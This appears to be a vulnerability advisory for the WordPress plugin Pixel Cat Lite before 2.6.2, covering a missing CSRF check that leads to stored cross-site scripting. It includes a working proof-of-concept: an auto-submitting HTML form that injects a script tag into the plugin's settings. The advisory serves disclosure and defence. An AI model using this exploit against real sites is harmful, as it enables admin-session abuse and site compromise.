Pixel Cat Lite < 2.6.2 - CSRF to Stored Cross-Site Scripting

2021-11-1500:00:00

JrXnm

pixel cat lite

cross-site scripting

csrf

security vulnerability

form injection

EPSS

0.001

Percentile

32.0%

JSON

The plugin does not have CSRF check when saving its settings, and did not sanitise as well as escape some of them, which could allow attacker to make a logged in admin change them and perform Cross-Site Scripting attacks

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=fca_pc_settings_page" id="hack" method="post">
      <input type="hidden" name="fca_pc[has_save]" value="1" />
      <input type="hidden" name="fca_pc_save" value="1" />
      <input type="hidden" name="fca[trigger_type]" value="post" />
      <input type="hidden" name="fca_pc[event_name]" value="" />
      <input type="hidden" name="fca_pc[value]" value="" />
      <input type="hidden" name="fca_pc[currency]" value="" />
      <input type="hidden" name="fca_pc[content_name]" value="" />
      <input type="hidden" name="fca_pc[content_type]" value="product" />
      <input type="hidden" name="fca_pc[content_ids]" value="" />
      <input type="hidden" name="fca_pc[content_category]" value="" />
      <input type="hidden" name="fca_pc[search_string]" value="" />
      <input type="hidden" name="fca_pc[num_items]" value="" />
      <input type="hidden" name="fca_pc[status]" value="" />
      <input type="hidden" name="fca_pc[google_product_category]" value="'><script>alert(document.domain);</script>" />
      <input type="submit" value="submit request" />
    </form>
  </body>
  <script>
      var form1 = document.getElementById('hack');
      form1.submit();
  </script>
</html>

EPSS

0.001

Percentile

32.0%

JSON

Related for WPEX-ID:399FFD65-F3C0-4FBE-A83A-2A620976AAD2